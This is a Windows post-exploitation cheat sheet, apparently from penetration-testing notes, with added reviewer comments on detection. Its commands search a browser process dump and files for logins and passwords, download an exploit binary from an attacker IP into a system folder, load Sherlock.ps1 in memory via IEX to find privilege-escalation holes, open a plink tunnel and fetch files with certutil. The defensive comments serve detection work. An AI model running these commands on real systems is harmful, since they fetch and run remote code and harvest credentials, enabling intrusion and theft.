Searching
# Pass the dump file to Select-String, which prints every line matching the pattern "login".
# -Recurse and -File are supplied although -Path names a single file rather than a directory.
# NOTE(review): judging by its name this looks like a browser process dump; such dumps can hold
# credentials in cleartext, so store them as sensitive data and restrict read access.
Get-ChildItem -Path "C:\Users\Chase\Desktop\2104firefox.dmp" -Recurse -File | Select-String login
Download
# Start PowerShell with the execution policy set to bypass and download 41020.exe over plain HTTP
# from 10.10.14.18:8888 into C:\windows\system32\spool\drivers\color\.
# The transfer is unauthenticated and the file is not hash-checked after download.
# NOTE(review): execution policy is not a security boundary, so "-exec bypass" is something to
# alert on, not a control to rely on. Process-creation logging with full command lines, plus
# file-create events for executables under spool\drivers\color, cover this pattern; confirm the
# directory's ACLs on your build, since it is commonly writable by standard users.
powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.18:8888/41020.exe' -OutFile 'C:\windows\system32\spool\drivers\color\41020.exe'"
Execution
# Download Sherlock.ps1 over plain HTTP as a string, run it in memory with IEX (Invoke-Expression),
# then call Find-AllVulns from the loaded script.
# The download step writes no script file to disk, so on-disk scanning alone does not see it;
# PowerShell Script Block Logging (event ID 4104) and AMSI are the places where the content is visible.
# NOTE(review): -Command 'start powershell.exe' is kept as on the page; confirm that the loaded
# script's Find-AllVulns actually accepts that parameter.
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'"
Recursively list the accessible files
# List the full path of every item below the current directory whose name matches *.*
# (no -File switch, so matching directories are listed too).
# Aliases are written out and the typographic dash on the parameter is an ASCII hyphen.
Get-ChildItem -Recurse -Include *.* | Select-Object Fullname
Search for a file by name, or search file contents
# Look for abc.txt in the current directory and all subdirectories (/s), pausing after each screen (/p).
dir /s /p abc.txt
# Case-insensitive (/i) search for the string "password" in every file below the current directory (/s).
# NOTE(review): any hit is a credential stored in cleartext on disk; move it to a secret store and rotate it.
findstr /s /i "password" *.*
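# Answer the prompt message with "y"
# The piped "y" accepts plink's unknown-host-key prompt without checking the fingerprint, so the
# server's identity is never verified; pinning the expected key with -hostkey avoids that.
# -pw places the password on the command line, where process-creation logs and process listings show it.
# The options use ASCII hyphens; the typographic dashes on the page are not parsed as options by plink.
# NOTE(review): the command ends at -R on the page; -R takes a forwarding specification and is
# followed by the destination host, neither of which is shown here.
cmd.exe /c echo y | plink.exe -ssh -l username -pw password -R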
Download a file
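# Fetch http://ip/file through certutil's URL cache verb and save it locally as "file".
# The stray space after "-" is removed so that certutil receives the -urlcache verb.
# NOTE(review): certutil is a signed Windows binary, so this download does not stand out by image name;
# alert on certutil command lines that combine urlcache with a URL, and verify the hash of anything fetched this way.
certutil.exe -urlcache -split -f http://ip/file file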